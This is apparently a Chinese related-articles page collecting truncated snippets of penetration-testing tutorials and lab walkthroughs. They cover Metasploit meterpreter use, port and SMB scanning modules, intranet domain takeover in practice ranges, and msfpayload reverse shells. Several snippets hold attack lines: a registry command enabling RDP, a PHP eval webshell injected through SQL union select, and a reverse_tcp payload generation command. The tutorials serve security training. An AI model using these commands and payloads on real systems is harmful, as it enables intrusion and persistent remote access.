MSF内网信息收集】的更多相关文章

进入meterpreter模式 在meterpreter中输入shell即可进入CMD窗口接着即可执行CMD命令,例如打开RDP服务REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f meterpreter模式 1.输入screenshot截个图看看主人在干什么吧. 2.wdigest //抓取明文密码(需加载m…
端口扫描 auxiliary/scanner/portscan scanner/portscan/ack        ACK防火墙扫描 scanner/portscan/ftpbounce  FTP跳端口扫描 scanner/portscan/syn        SYN端口扫描 scanner/portscan/tcp        TCP端口扫描 scanner/portscan/xmas       TCP"XMas"端口扫描 SMB扫描 smb枚举auxiliary/scan…
前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题 ①将shell.php写入网站根目录,payload http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>&…
最近发现了一个内网的靶场网站,简单配置一下网络就可以,不用自己搭建这么麻烦漏洞信息 (qiyuanxuetang.net) 环境配置 内网1靶场由三台机器构成:WIN7.2008 server.2003 server 其中WIN7做为对外的web机,2008作为域控 WIN7添加一个网卡,一个设为仅主机,一个设为NET 2003.2008 设为仅主机 初始密码hongrisec@2019 信息收集 深入探测 80端口和3306端口 ,查看80端口 一个phpstudy的探针界面,一般来说后台登陆…
环境配置 内网2靶场由三台机器构成:WIN7.2008 server.2012 server 其中2008做为对外的web机,win7作为个人主机可上网,2012作为域控 网络适配器已经设置好了不用自己设置 初始密码1qaz@WSX WEB主机初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX ,然后修改WEB\de1ay的密码 注意需要手动开启服务,在 C:\Oracle\Middleware\user_projects\domains\base_domain\bin 下有一个…
环境 漏洞详情 (qiyuanxuetang.net) 仅主机模式内网网段192.168.183.0/24 外网网段192.168.157.0/24 其中Ubuntu作为对外的内网机器 攻击机kali地址:192.168.157.129  悬剑:192.168.157.130 还需要进入ubuntu开启服务,密码ubuntu cd /home/ubuntu/Desktop/vulhub/struts2/s2-045vsudo docker-compose up -d cd /home/ubunt…
实验环境搭建 漏洞详情 (qiyuanxuetang.net) "此次靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集.Web攻防.代码审计.漏洞利用.内网渗透以及域渗透等相关内容学习,此靶场主要用来学习,请大家遵守网络网络安全法." win7密码 sun\heart 123.com sun\Administrator dc123.com 2008密码 sun\admin 2020.com 拓扑图大致如下 攻击机kali:192.168.200.3…
前言: 我们在平常打点的时候,遇到有内网或者有域的环境的时候,我们只获得了内网中的一台机子的shell,由这台机子我们可以获得这台机子所在的网段的相关其他主机.比如说有域的时候的域控机,有多层内网的堡垒机等,下面将介绍如何用已控制的内网机拿到域控的方法. 0x00 环境 假如是一个域环境: 域控: 192.168.106.129 已经控制的内网机: 192.168.106.120 其他假如存在一些其他普通的机子. 0x01 内网信息收集 初步的查看网络信息: ipconfig /all nets…
@Webkio 前言: 最近在跟朋友搞一些项目玩,所以最近没怎么更新内容接下来我将在虚拟中模拟内网多层靶场,进行内网渗透实验,超详细,适合小白.本文仅供网安学习,不可利用于未授权渗透工作中,否则后果自负.码字截图不易,转载记得署名. 微信关注公众号: JiuZhouSec 不定期更新渗透干货,适合小白学习.九州大地,一起Dayday UP! 模拟内网靶场 进行内网实验 我将从以下几点简述:[上线边界机器]-[内网渗透]-[横向移动]-[痕迹清除] 实验码字不易,转载文章请署名 实验对象 这边基于…
x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPOR…